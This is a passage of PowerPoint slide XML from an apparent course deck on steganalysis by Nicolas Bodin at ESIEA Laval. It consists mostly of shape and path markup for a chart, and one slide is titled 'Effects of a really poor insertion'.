            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="34289">
                <a:moveTo>
                  <a:pt x="0" y="33549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="33825"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="object 547"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8199767" y="5651067"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="39513">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="object 548"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8199767" y="5613255"/>
            <a:ext cx="1258" cy="78018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="39369">
                <a:moveTo>
                  <a:pt x="0" y="19418"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151" y="19418"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38837">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="object 549"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8227672" y="5652680"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="37884">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="object 550"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8227671" y="5614843"/>
            <a:ext cx="2517" cy="75501"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="38100">
                <a:moveTo>
                  <a:pt x="1244" y="37760"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1244" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="37760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="38036"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="object 551"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8255524" y="5655625"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="34902">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="object 552"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8254732" y="5623187"/>
            <a:ext cx="1258" cy="67951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="34289">
                <a:moveTo>
                  <a:pt x="0" y="33549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="33825"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="object 553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8283704" y="5577061"/>
            <a:ext cx="0" cy="113251"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="57150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57103"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="object 554"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8283431" y="5579783"/>
            <a:ext cx="2517" cy="110735"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="55880">
                <a:moveTo>
                  <a:pt x="698" y="55452"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="698" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="55452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="55728"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="object 555"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8311610" y="5568468"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61438"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="object 556"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8309406" y="5570099"/>
            <a:ext cx="2517" cy="120801"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1270" h="60960">
                <a:moveTo>
                  <a:pt x="0" y="60339"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="60339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="60615"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="object 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="1688862"/>
            <a:ext cx="7124770" cy="4001549"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3595370" h="2019300">
                <a:moveTo>
                  <a:pt x="0" y="59"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="676" y="2018774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3594904" y="2018715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3594925" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="object 558"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="object 559"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13054948" y="12638854"/>
            <a:ext cx="4167651" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="50335">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>27 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="89" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Rectangle 559"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4075101315"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1034363" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Steganalysis</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7765562" y="88033"/>
            <a:ext cx="820443" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>B.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549737" y="682125"/>
            <a:ext cx="4774175" cy="426912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2774" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Effects </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>really poor</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="515" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2774" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>insertion</a:t>
            </a:r>
            <a:endParaRPr sz="2774">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2155027" y="5903644"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="42035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149071" y="5903644"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="42035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3149071" y="1544276"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="42035"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143912" y="5903644"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="42035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4143912" y="1544276"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="42035"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5137960" y="5903644"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="42035"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5137960" y="1544276"/>
            <a:ext cx="0" cy="84309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="42544">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="42035"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
